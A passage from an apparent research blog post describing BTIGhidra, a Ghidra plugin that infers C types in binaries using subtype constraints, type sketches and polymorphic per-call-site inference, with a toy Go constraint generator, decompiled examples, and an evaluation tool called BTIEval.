Binary type inference proceeds similarly, but information lost during compilation increases the difficulty of collecting type constraints. To meet this challenge, BTIGhidra runs various flow-sensitive data-flow analyses (e.g., value-set analysis) provided by and implemented using FKIE-CAD’s cwe_checker to track how values flow between program variables. These flows inform which variables or memory objects must be subtypes of other objects. Abstractly, if a value flows from a variable x into a variable y, then we can conservatively conclude that x is a subtype of y.
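
As a toy illustration of this constraint-generation step (our own sketch, not BTIGhidra’s code, which derives flows from data-flow analysis rather than the explicit lists and illustrative variable names used here), each observed flow from x to y yields the constraint x <: y, and passing a variable to a function with a known signature constrains it against the declared parameter type:

// Toy illustration of subtype constraint generation (not BTIGhidra's code).
package main

import "fmt"

// Constraint states that Sub is a subtype of Super.
type Constraint struct{ Sub, Super string }

// Flow records that a value flows from Src into Dst.
type Flow struct{ Src, Dst string }

// CallArg records that variable Var is passed to a parameter whose
// declared type is known from a function signature (e.g., size_t).
type CallArg struct{ Var, ParamType string }

// generate emits one subtype constraint per observed flow and call argument.
func generate(flows []Flow, args []CallArg) []Constraint {
    var cs []Constraint
    for _, f := range flows {
        cs = append(cs, Constraint{Sub: f.Src, Super: f.Dst})
    }
    for _, a := range args {
        cs = append(cs, Constraint{Sub: a.Var, Super: a.ParamType})
    }
    return cs
}

func main() {
    cs := generate(
        []Flow{{Src: "param_2", Dst: "local_20"}},
        []CallArg{{Var: "local_20", ParamType: "size_t"}},
    )
    for _, c := range cs {
        fmt.Printf("%s <: %s\n", c.Sub, c.Super)
    }
}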

Using this data-flow information, BTIGhidra independently generates subtyping constraints for each strongly connected component (SCC)2 of functions in the binary’s call graph. Next, BTIGhidra simplifies signatures by using a set of proof rules to solve for all derivable relationships between interesting variables (i.e., type constants like int and size_t, functions, and global variables) within an SCC. These signatures act as a summary of the function’s typing effects when it is called. Finally, BTIGhidra solves for the type sketch of each SCC, using the signatures of called SCCs as needed.

Type sketches are our representation of recursively constrained types. They represent a type as a directed graph, with edges labeled by fields that represent the capabilities of a type and nodes labeled by a bound [lb,ub]. Figure 10 shows an example of a type sketch for the value_dump function signature. As an example, the path from node 3 to 8 can be read as “the type with ID 3 is a function that has a second in parameter which is an atomic type that is a subtype of size_t and a supertype of bottom.” These sketches provide a convenient representation of types when lowering to C types through a fairly straightforward graph traversal. Type sketches also form a lattice with a join and meet operator defined by language intersection and union, respectively. These operations are useful for manipulating types while determining the most precise polymorphic type we can infer for each function in the binary. Join allows the algorithm to determine the least supertype of two sketches, and meet allows the algorithm to determine the greatest subtype of two sketches.

Figure 10: Type sketch for the value_dump function signature

The importance of polymorphic type inference

Using a type system that supports polymorphism may seem odd for inferring C types when C has no explicit support for polymorphism. However, polymorphism is critical for maintaining conservative types in the presence of C idioms, such as handling multiple types in a function by dispatching over a void pointer. Perhaps the most canonical examples of polymorphic functions in C are malloc and free.

Figure 11: Example program that uses free polymorphically

In the example above, we consider a simple (albeit contrived) program that passes two structs to free. We access the fields of both foo and bar to reveal field information to the type inference algorithm. To demonstrate the importance of polymorphism, I modified the constraint generation phase of type inference to generate a single formal type variable for each function, rather than a type variable per call site. This change has the effect of unifying all constraints on free, regardless of the calling context.

The resulting unsound decompilation is as follows:

struct_for_node_0_13 * produce(struct_for_node_0_13 *param_1, struct_for_node_0_13 *param_2)
{
  param_1->field_at_0 = param_2->field_at_8;
  param_1->field_at_8 = param_2->field_at_0;
  param_1->field_at_16 = param_2->field_at_0;
  free(param_1);
  free(param_2);
  return param_1;
}

Figure 12: Unsound inferred type for the parameters to produce

The assumption that function calls are non-polymorphic leads to inferring an over-precise type for the function’s parameters (shown in figure 12), causing both parameters to have the same type with three fields.

Instead of unifying all call sites of a function, BTIGhidra generates a type variable per call site and unifies the actual parameter type with the formal parameter type only if the inferred type is structurally equal after a refinement pass. This conservative assumption allows BTIGhidra to remain sound and derive the two separate types for the parameters to the function in figure 11:

struct_for_node_0_16 * produce(struct_for_node_0_16 *param_1, struct_for_node_0_20 *param_2)
{
  param_1->field_at_0 = param_2->field_at_8;
  param_1->field_at_8 = param_2->field_at_0;
  param_1->field_at_16 = param_2->field_at_0;
  free(param_1);
  free(param_2);
  return param_1;
} 

Evaluating BTIGhidra

Inter-procedural type inference on binaries operates over a vast set of information collected on the target program. Each analysis involved is a hard computational problem in its own right. Ghidra and our flow-sensitive analyses use heuristics related to control flow, ABI information, and other constructs. These heuristics can lead to incorrect type constraints, which can have wide-ranging effects when propagated.

Mitigating these issues requires a strong testing and validation strategy. In addition to BTIGhidra itself, we also released BTIEval, a tool for evaluating the precision of type inference on binaries with known ground-truth types. BTIEval takes a binary with debug information and compares the types recovered by BTIGhidra to those in the debug information (the debug info is ignored during type inference). The evaluation utility aggregates soundness and precision metrics. Utilizing BTIEval more heavily and over more test binaries will help us provide better correctness guarantees to users. BTIEval also collects timing information, allowing us to evaluate the performance impacts of changes.

Give BTIGhidra a try

The pre-built Ghidra plugin is located here or can be built from the source. The walkthrough instructions are helpful for learning how to run the analysis and update it with new type signatures. We look forward to getting feedback on the tool and welcome any contributions!

Acknowledgments

BTIGhidra’s underlying type inference algorithm was inspired by and is based on an algorithm proposed by Noonan et al. The methods described in the paper are patented under process patent US10423397B2 held by GrammaTech, Inc. Any opinions, findings, conclusions, or recommendations expressed in this blog post are those of the author(s) and do not necessarily reflect the views of GrammaTech, Inc.

We would also like to thank the team at FKIE-CAD behind CWE Checker. Their static analysis platform over Ghidra PCode provided an excellent base set of capabilities in our analysis.

This research was conducted by Trail of Bits based upon work supported by DARPA under Contract No. HR001121C0111 (Distribution Statement A, Approved for Public Release: Distribution Unlimited). Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the United States Government or DARPA.

1Instructions for how to use the plugin to reproduce this demo are available here.
2A strongly connected component of a graph is a set of nodes in a directed graph where there exists a path from each node in the set to every other node in the set. Conceptually an SCC of functions separates the call graphs into groups of functions that do not recursively call each other.
